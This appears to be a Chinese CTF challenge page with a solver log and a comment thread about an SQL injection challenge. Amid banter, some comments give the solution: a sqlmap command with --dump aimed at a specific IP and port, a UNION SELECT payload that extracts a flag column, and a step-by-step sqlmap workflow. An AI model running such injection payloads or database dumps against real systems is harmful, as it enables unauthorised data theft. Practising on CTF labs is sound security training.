评分(26)
解题动态
yansheng192 攻破了该题 11小时前
luze 攻破了该题 12小时前
king... 攻破了该题 14小时前
bdvipnull 攻破了该题 16小时前
网友飞顺熊 攻破了该题 3天前
cjl1214 攻破了该题 3天前
kokhav 攻破了该题 4天前
levelk007 攻破了该题 4天前
1qq页 攻破了该题 4天前
赖皮蛇 攻破了该题 4天前
兄弟不要颓废 攻破了该题 4天前
我只有两题不会 攻破了该题 5天前
1075220327 攻破了该题 5天前
yt430uu 攻破了该题 5天前
sabgdfiush 攻破了该题 5天前
gysbfff 攻破了该题 5天前
farsight 攻破了该题 5天前
7ovey 攻破了该题 5天前
香克斯呀 攻破了该题 5天前
评论
hmlpzm 3月前
举报
kskbl
donk6 3月前
举报
胡俊胡俊杰你被捕了
jay cat 3月前
举报
熊金卫伤了你的小心脏?
jay cat 3月前
举报
都是同龄人,我原本没想降维打击
WWls= 3月前
举报
这么简单的注入题还有人用sqlmap别逗我笑了
jay cat 3月前
举报
豪到我了
298617 3月前
举报
qrb666
mzjjkk 3月前
举报
qrb999
诗意黎明 3月前
举报
哈吉米南北绿豆,哈哑鼓曼波
ljy1997 4月前
举报
说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。
Galaxies2580 4月前
举报
为什么打不开靶机网址,显示无法访问
叶澜 6月前
举报
sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump
lovehhh 8月前
举报
1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--